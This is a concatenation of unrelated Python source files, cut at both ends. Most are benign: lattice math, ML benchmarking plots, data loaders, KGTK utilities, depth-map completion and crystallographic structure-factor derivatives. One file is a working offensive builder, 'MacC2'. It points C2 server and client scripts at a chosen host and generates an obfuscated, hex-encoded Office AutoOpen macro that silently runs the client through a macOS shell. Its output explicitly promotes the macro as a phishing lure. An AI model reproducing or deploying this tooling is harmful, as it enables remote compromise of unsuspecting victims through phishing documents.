from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta1 condition
if c%2==0:
            bs = [0, c//2]
else:
bs = [0]
#gamma1 and gamma2 condition
if f%2==0:
            ed_vals = [0, f//2]
else:
ed_vals = [0]
for b in bs:
for e in ed_vals:
#gamma1 condition
if (2*b*e)%(f*c)==0:
for d in ed_vals:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
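# Minimal usage sketch (illustrative, not part of the original module; it assumes the
# opf_python package providing get_HNF_diagonals is importable):
if __name__ == "__main__":
    for hnf in so_32(4):
        # each entry is a lower-triangular 3x3 HNF that preserves the lattice symmetry
        print(hnf)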
|
1619816
|
from pkg_resources import DistributionNotFound
from pkg_resources import get_distribution
try:
__version__ = get_distribution(__name__).version
except DistributionNotFound:
pass
from .koopman import Koopman
from .koopman_continuous import KoopmanContinuous
__all__ = [
"Koopman",
"KoopmanContinuous",
"common",
"differentiation",
"observables",
"regression",
]
|
1619826
|
import json
import matplotlib.pyplot as plt
def autolabel(ax, rects):
"""
Attach a text label above each bar displaying its height
"""
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., 1.05*height,
'%0.4f' % float(height),
ha='center', va='bottom')
def draw_bar(x, t, y, subplot, color, x_lab, y_lab, width=0.2):
plt.subplot(subplot)
plt.xticks(x, t)
ax1 = plt.gca()
ax1.set_xlabel(x_lab)
ax1.set_ylabel(y_lab, color=color)
rects1 = ax1.bar(x, y, color=color, width=width)
ax1.tick_params(axis='y', labelcolor=color)
autolabel(ax1, rects1)
def fix_len(name, length):
if len(name)<length:
name+=(" "*(length-len(name)))
return name
def format_print(name, values):
[a, b] =values
a=str(a)
b=str(b)
name = fix_len(name, 16)
a = fix_len(a, 24)
b = fix_len(b, 24)
print("{}{}{}".format(name, a, b))
def load_res(json_file):
with open(json_file) as f:
data = json.load(f)
return data
res_32 = load_res('./fp32.json')
res_8 = load_res('./int8.json')
#accuracys = [res_32['accuracy'], res_8['accuracy']]
throughputs = [res_32['throughput'], res_8['throughput']]
latencys = [res_32['latency'], res_8['latency']]
format_print('Model', ['FP32', 'INT8'])
format_print('throughput(fps)', throughputs)
format_print('latency(ms)', latencys)
#format_print('accuracy(%)', accuracys)
#accuracys_perc = [accu*100 for accu in accuracys]
t = ['FP32', 'INT8']
x = [0, 1]
plt.figure(figsize=(16,6))
draw_bar(x, t, throughputs, 131, 'tab:green', 'Throughput(fps)', '', width=0.2)
draw_bar(x, t, latencys, 132, 'tab:blue', 'Latency(ms)', '', width=0.2)
#draw_bar(x, t, accuracys_perc, 133, '#28a99d', 'Accuracys(%)', '', width=0.2)
plt.savefig("fp32_int8_aboslute.png")
print("\nSave to fp32_int8_aboslute.png\n")
throughputs_times = [1, throughputs[1]/throughputs[0]]
latencys_times = [1, latencys[1]/latencys[0]]
#accuracys_times = [1, accuracys_perc[1]/accuracys_perc[0]]
format_print('Model', ['FP32', 'INT8'])
format_print('throughput_times', throughputs_times)
format_print('latency_times', latencys_times)
#format_print('accuracy_times', accuracys_times)
plt.figure(figsize=(16,6))
draw_bar(x, t, throughputs_times, 131, 'tab:green', 'Throughput Normalized (higher is better)', '', width=0.2)
draw_bar(x, t, latencys_times, 132, 'tab:blue', 'Latency Normalized (lower is better)', '', width=0.2)
#draw_bar(x, t, accuracys_times, 133, '#28a99d', 'Accuracys Normalized (small is better)', '', width=0.2)
plt.savefig("fp32_int8_times.png")
print("\nSave to fp32_int8_times.png")
|
1619844
|
r"""
Concentration of the eigenvalues
================================
The eigenvalues of the graph Laplacian concentrate to the same value as the
graph becomes fully connected.
"""
import numpy as np
from matplotlib import pyplot as plt
import pygsp as pg
n_neighbors = [1, 2, 5, 8]
fig, axes = plt.subplots(3, len(n_neighbors), figsize=(15, 8))
for k, ax in zip(n_neighbors, axes.T):
graph = pg.graphs.Ring(17, k=k)
graph.compute_fourier_basis()
graph.plot(graph.U[:, 1], ax=ax[0])
ax[0].axis('equal')
ax[1].spy(graph.W)
ax[2].plot(graph.e, '.')
ax[2].set_title('k={}'.format(k))
#graph.set_coordinates('line1D')
#graph.plot(graph.U[:, :4], ax=ax[3], title='')
# Check that the DFT matrix is an eigenbasis of the Laplacian.
U = np.fft.fft(np.identity(graph.n_vertices))
LambdaM = (graph.L.todense().dot(U)) / (U + 1e-15)
# Eigenvalues should be real.
assert np.all(np.abs(np.imag(LambdaM)) < 1e-10)
LambdaM = np.real(LambdaM)
# Check that the eigenvectors are really eigenvectors of the laplacian.
Lambda = np.mean(LambdaM, axis=0)
assert np.all(np.abs(LambdaM - Lambda) < 1e-10)
fig.tight_layout()
|
1619860
|
import scipy.misc
import random
xs = []
ys = []
#points to the end of the last batch
train_batch_pointer = 0
val_batch_pointer = 0
#read data.txt
with open("driving_dataset/data.txt") as f:
for line in f:
xs.append("driving_dataset/" + line.split()[0])
#the paper by Nvidia uses the inverse of the turning radius,
#but steering wheel angle is proportional to the inverse of turning radius
#so the steering wheel angle in radians is used as the output
ys.append(float(line.split()[1]) * scipy.pi / 180)
xs = xs[:10000]
ys = ys[:10000]
#get number of images
num_images = len(xs)
#shuffle list of images
#c = list(zip(xs, ys))
#random.shuffle(c)
#xs, ys = zip(*c)
train_xs = xs[:int(len(xs) * 0.8)]
train_ys = ys[:int(len(xs) * 0.8)]
val_xs = xs[-int(len(xs) * 0.2):]
val_ys = ys[-int(len(xs) * 0.2):]
num_train_images = len(train_xs)
num_val_images = len(val_xs)
def LoadTrainBatch(batch_size):
global train_batch_pointer
x_out = []
y_out = []
for i in range(0, batch_size):
x_out.append(scipy.misc.imresize(scipy.misc.imread(train_xs[(train_batch_pointer + i) % num_train_images])[-150:], [66, 200]) / 255.0)
y_out.append([train_ys[(train_batch_pointer + i) % num_train_images]])
train_batch_pointer += batch_size
return x_out, y_out
def LoadValBatch(batch_size):
global val_batch_pointer
x_out = []
y_out = []
for i in range(0, batch_size):
x_out.append(scipy.misc.imresize(scipy.misc.imread(val_xs[(val_batch_pointer + i) % num_val_images])[-150:], [66, 200]) / 255.0)
y_out.append([val_ys[(val_batch_pointer + i) % num_val_images]])
val_batch_pointer += batch_size
return x_out, y_out
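# Minimal usage sketch (illustrative, not part of the original loader): fetch one
# training batch; images are 66x200 and scaled to [0, 1], labels are steering angles in radians.
if __name__ == "__main__":
    x_batch, y_batch = LoadTrainBatch(8)
    print(len(x_batch), len(y_batch))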
|
1619880
|
from __future__ import print_function
import operator
from arcapix.fs.gpfs import ManagementPolicy, MapReduceRule
# create a policy object
p = ManagementPolicy()
# define a map function
def mapfn(f):
# returns a set of any file xattr names
try:
return set(f.xattrs.split())
except AttributeError:
return set()
# create a MapReduce rule
# reduce function combines individual sets to return unique xattr names
r = p.rules.new(MapReduceRule, 'xattrset', mapfn, operator.ior)
# change 'show' to list the file xattr names
# (these aren't returned by the policy engine by default)
r.change(show="('xattrs=' || GetXattrs('*', 'key'))")
# run the policy
print(p.run('mmfs1')['xattrset'])
# prints a set of unique file xattr names, e.g.
# {'gpfs.CLONE', 'user.foo', 'user.owner'}
|
1619882
|
from pathlib import Path
import typer
APP_NAME = "my-super-cli-app"
def main():
app_dir = typer.get_app_dir(APP_NAME)
app_dir_path = Path(app_dir)
app_dir_path.mkdir(parents=True, exist_ok=True)
config_path: Path = Path(app_dir) / "config.json"
if not config_path.is_file():
config_path.write_text('{"version": "1.0.0"}')
config_file_str = str(config_path)
typer.echo("Opening config directory")
typer.launch(config_file_str, locate=True)
if __name__ == "__main__":
typer.run(main)
|
1619891
|
import attr
import typing
from kgtk.kgtkformat import KgtkFormat
@attr.s(slots=True, frozen=False)
class KgtkMergeColumns:
"""Merge columns from multiple KgtkReaders, respecting predefined column
names with aliases.
"""
# For attrs 19.1.0 and later:
column_names: typing.List[str] = attr.ib(validator=attr.validators.deep_iterable(member_validator=attr.validators.instance_of(str),
iterable_validator=attr.validators.instance_of(list)),
factory=list)
# Keep a record of the reserved columns with aliases as we encounter them.
# We will retain the first alias encountered of each group.
id_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
node1_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
label_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
node2_column_idx: int = attr.ib(validator=attr.validators.instance_of(int), default=-1)
# The column name map is a debugging convenience. It is not required for
# the merge algorithm.
column_name_map: typing.MutableMapping[str, int] = attr.ib(validator=attr.validators.deep_mapping(key_validator=attr.validators.instance_of(str),
value_validator=attr.validators.instance_of(int)),
factory=dict)
# Maintain a list of the old and new column name lists as a convenience
# for debugging and feedback.
old_column_name_lists: typing.List[typing.List[str]] = attr.ib(factory=list)
new_column_name_lists: typing.List[typing.List[str]] = attr.ib(factory=list)
def merge(self, column_names: typing.List[str], prefix: typing.Optional[str]=None):
"""Add column names into the merged column name list, respecting predefined
column names with aliases.
Return a list of new column names with predefined name aliases replaced with
the name first used in each alias group in the joint list of column names.
"""
new_column_names: typing.List[str] = [ ]
# Record the old column names for debugging.
self.old_column_name_lists.append(column_names.copy())
column_name: str
idx: int = 0
for idx, column_name in enumerate(column_names):
if column_name in KgtkFormat.ID_COLUMN_NAMES:
if self.id_column_idx >= 0:
column_name = self.column_names[self.id_column_idx]
else:
self.id_column_idx = len(self.column_names)
elif column_name in KgtkFormat.NODE1_COLUMN_NAMES:
if self.node1_column_idx >= 0:
column_name = self.column_names[self.node1_column_idx]
else:
self.node1_column_idx = len(self.column_names)
elif column_name in KgtkFormat.LABEL_COLUMN_NAMES:
if self.label_column_idx >= 0:
column_name = self.column_names[self.label_column_idx]
else:
self.label_column_idx = len(self.column_names)
elif column_name in KgtkFormat.NODE2_COLUMN_NAMES:
if self.node2_column_idx >= 0:
column_name = self.column_names[self.node2_column_idx]
else:
self.node2_column_idx = len(self.column_names)
else:
# Apply the optional prefix.
if prefix is not None and len(prefix) > 0:
column_name = prefix + column_name
new_column_names.append(column_name)
if column_name not in self.column_name_map:
self.column_name_map[column_name] = len(self.column_names)
self.column_names.append(column_name)
self.new_column_name_lists.append(new_column_names)
return new_column_names
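# Minimal usage sketch (illustrative, not part of the original module). It assumes the
# usual KgtkFormat alias groups (e.g. "from" aliasing "node1"); the exact alias lists
# come from the installed kgtk package.
def _merge_example():
    kmc = KgtkMergeColumns()
    print(kmc.merge(["id", "node1", "label", "node2"]))
    # Aliases collapse onto the first name seen; non-reserved columns get the prefix.
    print(kmc.merge(["id", "from", "label", "node2", "weight"], prefix="right."))
    print(kmc.column_names)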
|
1619905
|
import glob
import os
import sys
import time
import cv2
import numpy as np
import png
from ip_basic import depth_map_utils
from ip_basic import vis_utils
def main():
"""Depth maps are saved to the 'outputs' folder.
"""
##############################
# Options
##############################
# Validation set
input_depth_dir = os.path.expanduser(
'~/Kitti/depth/depth_selection/val_selection_cropped/velodyne_raw')
data_split = 'val'
# Test set
# input_depth_dir = os.path.expanduser(
# '~/Kitti/depth/depth_selection/test_depth_completion_anonymous/velodyne_raw')
# data_split = 'test'
# Fast fill with Gaussian blur @90Hz (paper result)
fill_type = 'fast'
extrapolate = True
blur_type = 'gaussian'
# Fast Fill with bilateral blur, no extrapolation @87Hz (recommended)
# fill_type = 'fast'
# extrapolate = False
# blur_type = 'bilateral'
# Multi-scale dilations with extra noise removal, no extrapolation @ 30Hz
# fill_type = 'multiscale'
# extrapolate = False
# blur_type = 'bilateral'
# Save output to disk or show process
save_output = True
##############################
# Processing
##############################
if save_output:
# Save to Disk
show_process = False
save_depth_maps = True
else:
if fill_type == 'fast':
raise ValueError('"fast" fill does not support show_process')
# Show Process
show_process = True
save_depth_maps = False
# Create output folder
this_file_path = os.path.dirname(os.path.realpath(__file__))
outputs_dir = this_file_path + '/outputs'
os.makedirs(outputs_dir, exist_ok=True)
output_folder_prefix = 'depth_' + data_split
output_list = sorted(os.listdir(outputs_dir))
if len(output_list) > 0:
split_folders = [folder for folder in output_list
if folder.startswith(output_folder_prefix)]
if len(split_folders) > 0:
last_output_folder = split_folders[-1]
last_output_index = int(last_output_folder.split('_')[-1])
else:
last_output_index = -1
else:
last_output_index = -1
output_depth_dir = outputs_dir + '/{}_{:03d}'.format(
output_folder_prefix, last_output_index + 1)
if save_output:
if not os.path.exists(output_depth_dir):
os.makedirs(output_depth_dir)
else:
raise FileExistsError('Already exists!')
print('Output dir:', output_depth_dir)
# Get images in sorted order
images_to_use = sorted(glob.glob(input_depth_dir + '/*'))
# Rolling average array of times for time estimation
avg_time_arr_length = 10
last_fill_times = np.repeat([1.0], avg_time_arr_length)
last_total_times = np.repeat([1.0], avg_time_arr_length)
num_images = len(images_to_use)
for i in range(num_images):
depth_image_path = images_to_use[i]
# Calculate average time with last n fill times
avg_fill_time = np.mean(last_fill_times)
avg_total_time = np.mean(last_total_times)
# Show progress
sys.stdout.write('\rProcessing {} / {}, '
'Avg Fill Time: {:.5f}s, '
'Avg Total Time: {:.5f}s, '
'Est Time Remaining: {:.3f}s'.format(
i, num_images - 1, avg_fill_time, avg_total_time,
avg_total_time * (num_images - i)))
sys.stdout.flush()
# Start timing
start_total_time = time.time()
# Load depth projections from uint16 image
depth_image = cv2.imread(depth_image_path, cv2.IMREAD_ANYDEPTH)
projected_depths = np.float32(depth_image / 256.0)
# Fill in
start_fill_time = time.time()
if fill_type == 'fast':
final_depths = depth_map_utils.fill_in_fast(
projected_depths, extrapolate=extrapolate, blur_type=blur_type)
elif fill_type == 'multiscale':
final_depths, process_dict = depth_map_utils.fill_in_multiscale(
projected_depths, extrapolate=extrapolate, blur_type=blur_type,
show_process=show_process)
else:
raise ValueError('Invalid fill_type {}'.format(fill_type))
end_fill_time = time.time()
# Display images from process_dict
if fill_type == 'multiscale' and show_process:
img_size = (570, 165)
x_start = 80
y_start = 50
x_offset = img_size[0]
y_offset = img_size[1]
x_padding = 0
y_padding = 28
img_x = x_start
img_y = y_start
max_x = 1900
row_idx = 0
for key, value in process_dict.items():
image_jet = cv2.applyColorMap(
np.uint8(value / np.amax(value) * 255),
cv2.COLORMAP_JET)
vis_utils.cv2_show_image(
key, image_jet,
img_size, (img_x, img_y))
img_x += x_offset + x_padding
if (img_x + x_offset + x_padding) > max_x:
img_x = x_start
row_idx += 1
img_y = y_start + row_idx * (y_offset + y_padding)
# Save process images
cv2.imwrite('process/' + key + '.png', image_jet)
cv2.waitKey()
# Save depth images to disk
if save_depth_maps:
depth_image_file_name = os.path.split(depth_image_path)[1]
# Save depth map to a uint16 png (same format as disparity maps)
file_path = output_depth_dir + '/' + depth_image_file_name
with open(file_path, 'wb') as f:
depth_image = (final_depths * 256).astype(np.uint16)
# pypng is used because cv2 cannot save uint16 format images
writer = png.Writer(width=depth_image.shape[1],
height=depth_image.shape[0],
bitdepth=16,
greyscale=True)
writer.write(f, depth_image)
end_total_time = time.time()
# Update fill times
last_fill_times = np.roll(last_fill_times, -1)
last_fill_times[-1] = end_fill_time - start_fill_time
# Update total times
last_total_times = np.roll(last_total_times, -1)
last_total_times[-1] = end_total_time - start_total_time
if __name__ == "__main__":
main()
|
1619913
|
import optparse
from optparse import OptionParser
import sys
import base64
import binascii
import os
import random
from random import randrange
if len(sys.argv) != 5 and '-h' not in sys.argv:
print("Usage: %s -s <C2 Server IP/domain> -p <C2 Server Port>" % sys.argv[0])
sys.exit(1)
parser = OptionParser()
parser.add_option("-s", "--server", help="C2 server IP address")
parser.add_option("-p", "--port", help="C2 server port")
(options, args) = parser.parse_args()
host = options.server
port = options.port
f1 = open('server.py','r')
f2 = open('MacC2_server.py','w')
for line in f1:
f2.write(line.replace('127.0.0.1', host).replace('port=443', 'port=%s'%port))
f1.close()
f2.close()
f3 = open('client.py','r')
f4 = open('MacC2_client.py', 'w')
for line in f3:
f4.write(line.replace('127.0.0.1', (host+":%s"%port)))
f3.close()
f4.close()
with open('MacC2_client.py', 'r') as file:
data = file.read()
data2 = binascii.hexlify(data.encode('utf-8'))
macrofile = open('macro.txt', 'w')
macrofile.write('Sub AutoOpen()\n')
macrofile.write("a = \"p\" + \"yt\" + \"h\" + \"on\"\n")
macrofile.write("b = \"ex\" + \"e\" + \"c\"\n")
macrofile.write("")
initializer = 0
totallength = len(data2)
chars = 'abcdef'
varname = ''.join(random.choices(chars, k=8))
rowcount = randrange(40,60)
while totallength > 0:
if initializer == 0:
int1 = rowcount*initializer
int2 = rowcount + int1
text2 = data2[int1:int2].decode('utf8')
macrofile.write("%s = \"%s\"\n" % (varname,text2))
totallength = totallength - rowcount
initializer = initializer + 1
else:
int3 = rowcount*initializer
int4 = rowcount + int3
text3 = data2[int3:int4].decode('utf8')
macrofile.write("%s = %s + \"%s\"\n" % (varname,varname,text3))
totallength = totallength - rowcount
initializer = initializer + 1
macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import sys,socket,binascii,commands,os,ssl;\" & b & \"(binascii.unhexlify({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname
macrofile.write(macro)
macrofile.write("End Sub\n")
macrofile.close()
os.system("cp client-orig.py client.py")
print("-"*100)
print("==>Start MacC2_server.py and then upload MacC2_client.py (or whatever you want to rename it) to your target macOS device and execute.")
print("==>Or you can use the macro generated by this script as a phishing lure (macro-enabled MS Office doc):")
print("Paste the macro code from macro.txt into your macro-enabled Office doc as a macro and send!")
print("[-] Note: When access is gained through the macro-enabled Word doc, some MacC2 functions may not work due to sandboxing.")
print("Happy hunting!")
print('')
print("Macro was written to macro.txt in the current working directory")
print("DONE!")
|
1619932
|
import re
from dataclasses import dataclass
regex = r"978[-0-9]{10,15}"
pattern = re.compile(regex)
@dataclass(init=False, eq=True, frozen=True)
class Isbn:
"""Isbn represents an ISBN code as a value object"""
value: str
def __init__(self, value: str):
if pattern.match(value) is None:
raise ValueError("isbn should be a valid format.")
object.__setattr__(self, "value", value)
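# A minimal usage sketch (editor's addition, not part of the original module):
# a value matching the 978-prefixed pattern constructs fine, anything else raises ValueError.
if __name__ == "__main__":
    book = Isbn("978-0132350884")
    print(book.value)
    try:
        Isbn("not-an-isbn")
    except ValueError as error:
        print(error)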
|
1619937
|
from autodesk.scheduler import Scheduler
from autodesk.states import UP, DOWN
from pandas import Timedelta
def test_active_for_30minutes_with_60minute_limit_and_desk_down():
active_time = Timedelta(minutes=30)
limits = (Timedelta(minutes=60), Timedelta(minutes=30))
scheduler = Scheduler(limits)
delay = scheduler.compute_delay(active_time, DOWN)
assert delay == Timedelta(minutes=30)
def test_active_for_30minutes_with_30minute_limit_and_desk_up():
active_time = Timedelta(minutes=30)
limits = (Timedelta(minutes=60), Timedelta(minutes=30))
scheduler = Scheduler(limits)
delay = scheduler.compute_delay(active_time, UP)
assert delay == Timedelta(0)
|
1619939
|
from __future__ import absolute_import, division, print_function
from scitbx.math import tensor_rank_2_gradient_transform_matrix
from scitbx import matrix
from scitbx.array_family import flex
import cmath
import math
from six.moves import zip
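# Editor's note: mtps is the -2*pi**2 prefactor of the Debye-Waller exponent; below it is used as
# exp(mtps * u_iso * d_star_sq) for isotropic and exp(mtps * h.u_star.h) for anisotropic displacements.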
mtps = -2 * math.pi**2
class structure_factor:
def __init__(self, xray_structure, hkl):
self.unit_cell = xray_structure.unit_cell()
self.space_group = xray_structure.space_group()
self.scatterers = xray_structure.scatterers()
self.site_symmetry_table = xray_structure.site_symmetry_table()
self.scattering_type_registry = xray_structure.scattering_type_registry()
self.hkl = hkl
self.d_star_sq = self.unit_cell.d_star_sq(hkl)
def f(self):
result = 0
tphkl = 2 * math.pi * matrix.col(self.hkl)
for scatterer in self.scatterers:
w = scatterer.weight()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = ffp + 1j * fdp
for s in self.space_group:
s_site = s * scatterer.site
alpha = matrix.col(s_site).dot(tphkl)
if (scatterer.flags.use_u_aniso()):
r = s.r().as_rational().as_float()
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
result += w * dw * ff * e
return result
def df_d_params(self):
tphkl = 2 * math.pi * matrix.col(self.hkl)
h,k,l = self.hkl
d_exp_huh_d_u_star = matrix.col([h**2, k**2, l**2, 2*h*k, 2*h*l, 2*k*l])
for i_scatterer,scatterer in enumerate(self.scatterers):
site_symmetry_ops = None
if (self.site_symmetry_table.is_special_position(i_scatterer)):
site_symmetry_ops = self.site_symmetry_table.get(i_scatterer)
site_constraints = site_symmetry_ops.site_constraints()
if (scatterer.flags.use_u_aniso()):
adp_constraints = site_symmetry_ops.adp_constraints()
w = scatterer.weight()
wwo = scatterer.weight_without_occupancy()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = ffp + 1j * fdp
d_site = matrix.col([0,0,0])
if (not scatterer.flags.use_u_aniso()):
d_u_iso = 0
d_u_star = None
else:
d_u_iso = None
d_u_star = matrix.col([0,0,0,0,0,0])
d_occ = 0j
d_fp = 0j
d_fdp = 0j
for s in self.space_group:
r = s.r().as_rational().as_float()
s_site = s * scatterer.site
alpha = matrix.col(s_site).dot(tphkl)
if (scatterer.flags.use_u_aniso()):
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
site_gtmx = r.transpose()
d_site += site_gtmx * (
w * dw * ff * e * 1j * tphkl)
if (not scatterer.flags.use_u_aniso()):
d_u_iso += w * dw * ff * e * mtps * self.d_star_sq
else:
u_star_gtmx = matrix.sqr(tensor_rank_2_gradient_transform_matrix(r))
d_u_star += u_star_gtmx * (
w * dw * ff * e * mtps * d_exp_huh_d_u_star)
d_occ += wwo * dw * ff * e
d_fp += w * dw * e
d_fdp += w * dw * e * 1j
if (site_symmetry_ops is not None):
gsm = site_constraints.gradient_sum_matrix()
gsm = matrix.rec(elems=gsm, n=gsm.focus())
d_site = gsm * d_site
if (scatterer.flags.use_u_aniso()):
gsm = adp_constraints.gradient_sum_matrix()
gsm = matrix.rec(elems=gsm, n=gsm.focus())
d_u_star = gsm * d_u_star
result = flex.complex_double(d_site)
if (not scatterer.flags.use_u_aniso()):
result.append(d_u_iso)
else:
result.extend(flex.complex_double(d_u_star))
result.extend(flex.complex_double([d_occ, d_fp, d_fdp]))
yield result
def d2f_d_params(self):
tphkl = 2 * math.pi * flex.double(self.hkl)
tphkl_outer = tphkl.matrix_outer_product(tphkl) \
.matrix_symmetric_as_packed_u()
h,k,l = self.hkl
d_exp_huh_d_u_star = flex.double([h**2, k**2, l**2, 2*h*k, 2*h*l, 2*k*l])
d2_exp_huh_d_u_star_u_star = d_exp_huh_d_u_star.matrix_outer_product(
d_exp_huh_d_u_star).matrix_symmetric_as_packed_u()
for i_scatterer,scatterer in enumerate(self.scatterers):
site_symmetry_ops = None
if (self.site_symmetry_table.is_special_position(i_scatterer)):
site_symmetry_ops = self.site_symmetry_table.get(i_scatterer)
site_constraints = site_symmetry_ops.site_constraints()
if (scatterer.flags.use_u_aniso()):
adp_constraints = site_symmetry_ops.adp_constraints()
w = scatterer.weight()
wwo = scatterer.weight_without_occupancy()
if (not scatterer.flags.use_u_aniso()):
huh = scatterer.u_iso * self.d_star_sq
dw = math.exp(mtps * huh)
gaussian = self.scattering_type_registry.gaussian_not_optional(
scattering_type=scatterer.scattering_type)
f0 = gaussian.at_d_star_sq(self.d_star_sq)
ffp = f0 + scatterer.fp
fdp = scatterer.fdp
ff = (ffp + 1j * fdp)
d2_site_site = flex.complex_double(3*(3+1)//2, 0j)
if (not scatterer.flags.use_u_aniso()):
d2_site_u_iso = flex.complex_double(flex.grid(3,1), 0j)
d2_site_u_star = None
else:
d2_site_u_iso = None
d2_site_u_star = flex.complex_double(flex.grid(3,6), 0j)
d2_site_occ = flex.complex_double(flex.grid(3,1), 0j)
d2_site_fp = flex.complex_double(flex.grid(3,1), 0j)
d2_site_fdp = flex.complex_double(flex.grid(3,1), 0j)
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso = 0j
d2_u_iso_occ = 0j
d2_u_iso_fp = 0j
d2_u_iso_fdp = 0j
else:
d2_u_star_u_star = flex.complex_double(6*(6+1)//2, 0j)
d2_u_star_occ = flex.complex_double(flex.grid(6,1), 0j)
d2_u_star_fp = flex.complex_double(flex.grid(6,1), 0j)
d2_u_star_fdp = flex.complex_double(flex.grid(6,1), 0j)
d2_occ_fp = 0j
d2_occ_fdp = 0j
for s in self.space_group:
r = s.r().as_rational().as_float()
s_site = s * scatterer.site
alpha = tphkl.dot(flex.double(s_site))
if (scatterer.flags.use_u_aniso()):
s_u_star_s = r*matrix.sym(sym_mat3=scatterer.u_star)*r.transpose()
huh = (matrix.row(self.hkl) * s_u_star_s).dot(matrix.col(self.hkl))
dw = math.exp(mtps * huh)
e = cmath.exp(1j*alpha)
site_gtmx = flex.double(r.transpose())
site_gtmx.reshape(flex.grid(3,3))
d2_site_site += (w * dw * ff * e * (-1)) * (
site_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
tphkl_outer))
if (not scatterer.flags.use_u_aniso()):
d2_site_u_iso += (w * dw * ff * e * 1j * mtps * self.d_star_sq) \
* site_gtmx.matrix_multiply(tphkl)
else:
u_star_gtmx = tensor_rank_2_gradient_transform_matrix(r)
d2_site_u_star += (w * dw * ff * e * 1j * mtps) \
* site_gtmx.matrix_multiply(
tphkl.matrix_outer_product(d_exp_huh_d_u_star)) \
.matrix_multiply(u_star_gtmx.matrix_transpose())
site_gtmx_tphkl = site_gtmx.matrix_multiply(tphkl)
d2_site_occ += (wwo * dw * ff * e * 1j) * site_gtmx_tphkl
d2_site_fp += (w * dw * e * 1j) * site_gtmx_tphkl
d2_site_fdp += (w * dw * e * (-1)) * site_gtmx_tphkl
if (not scatterer.flags.use_u_aniso()):
d2_u_iso_u_iso += w * dw * ff * e * (mtps * self.d_star_sq)**2
d2_u_iso_occ += wwo * dw * ff * e * mtps * self.d_star_sq
d2_u_iso_fp += w * dw * e * mtps * self.d_star_sq
d2_u_iso_fdp += 1j * w * dw * e * mtps * self.d_star_sq
else:
d2_u_star_u_star +=(w * dw * ff * e * mtps**2) \
* u_star_gtmx.matrix_multiply_packed_u_multiply_lhs_transpose(
d2_exp_huh_d_u_star_u_star)
u_star_gtmx_d_exp_huh_d_u_star = u_star_gtmx.matrix_multiply(
d_exp_huh_d_u_star)
d2_u_star_occ += (wwo * dw * ff * e * mtps) \
* u_star_gtmx_d_exp_huh_d_u_star
d2_u_star_fp += (w * dw * e * mtps) \
* u_star_gtmx_d_exp_huh_d_u_star
d2_u_star_fdp += (w * dw * 1j * e * mtps) \
* u_star_gtmx_d_exp_huh_d_u_star
d2_occ_fp += wwo * dw * e
d2_occ_fdp += wwo * dw * e * 1j
if (site_symmetry_ops is None):
i_u = 3
else:
i_u = site_constraints.n_independent_params()
if (not scatterer.flags.use_u_aniso()):
i_occ = i_u + 1
elif (site_symmetry_ops is None):
i_occ = i_u + 6
else:
i_occ = i_u + adp_constraints.n_independent_params()
i_fp, i_fdp, np = i_occ+1, i_occ+2, i_occ+3
if (site_symmetry_ops is not None):
gsm = site_constraints.gradient_sum_matrix()
d2_site_site = gsm.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_site_site)
if (not scatterer.flags.use_u_aniso()):
d2_site_u_iso = gsm.matrix_multiply(d2_site_u_iso)
else:
d2_site_u_star = gsm.matrix_multiply(d2_site_u_star)
d2_site_occ = gsm.matrix_multiply(d2_site_occ)
d2_site_fp = gsm.matrix_multiply(d2_site_fp)
d2_site_fdp = gsm.matrix_multiply(d2_site_fdp)
if (scatterer.flags.use_u_aniso()):
gsm = adp_constraints.gradient_sum_matrix()
d2_site_u_star = d2_site_u_star.matrix_multiply(
gsm.matrix_transpose())
d2_u_star_u_star = gsm \
.matrix_multiply_packed_u_multiply_lhs_transpose(
packed_u=d2_u_star_u_star)
d2_u_star_occ = gsm.matrix_multiply(d2_u_star_occ)
d2_u_star_fp = gsm.matrix_multiply(d2_u_star_fp)
d2_u_star_fdp = gsm.matrix_multiply(d2_u_star_fdp)
dp = flex.complex_double(flex.grid(np,np), 0j)
paste = dp.matrix_paste_block_in_place
paste(d2_site_site.matrix_packed_u_as_symmetric(), 0,0)
if (not scatterer.flags.use_u_aniso()):
paste(d2_site_u_iso, 0,i_u)
paste(d2_site_u_iso.matrix_transpose(), i_u,0)
else:
paste(d2_site_u_star, 0,i_u)
paste(d2_site_u_star.matrix_transpose(), i_u,0)
paste(d2_site_occ, 0,i_occ)
paste(d2_site_occ.matrix_transpose(), i_occ,0)
paste(d2_site_fp, 0,i_fp)
paste(d2_site_fp.matrix_transpose(), i_fp,0)
paste(d2_site_fdp, 0,i_fdp)
paste(d2_site_fdp.matrix_transpose(), i_fdp,0)
if (not scatterer.flags.use_u_aniso()):
dp[i_u*np+i_u] = d2_u_iso_u_iso
dp[i_u*np+i_occ] = d2_u_iso_occ
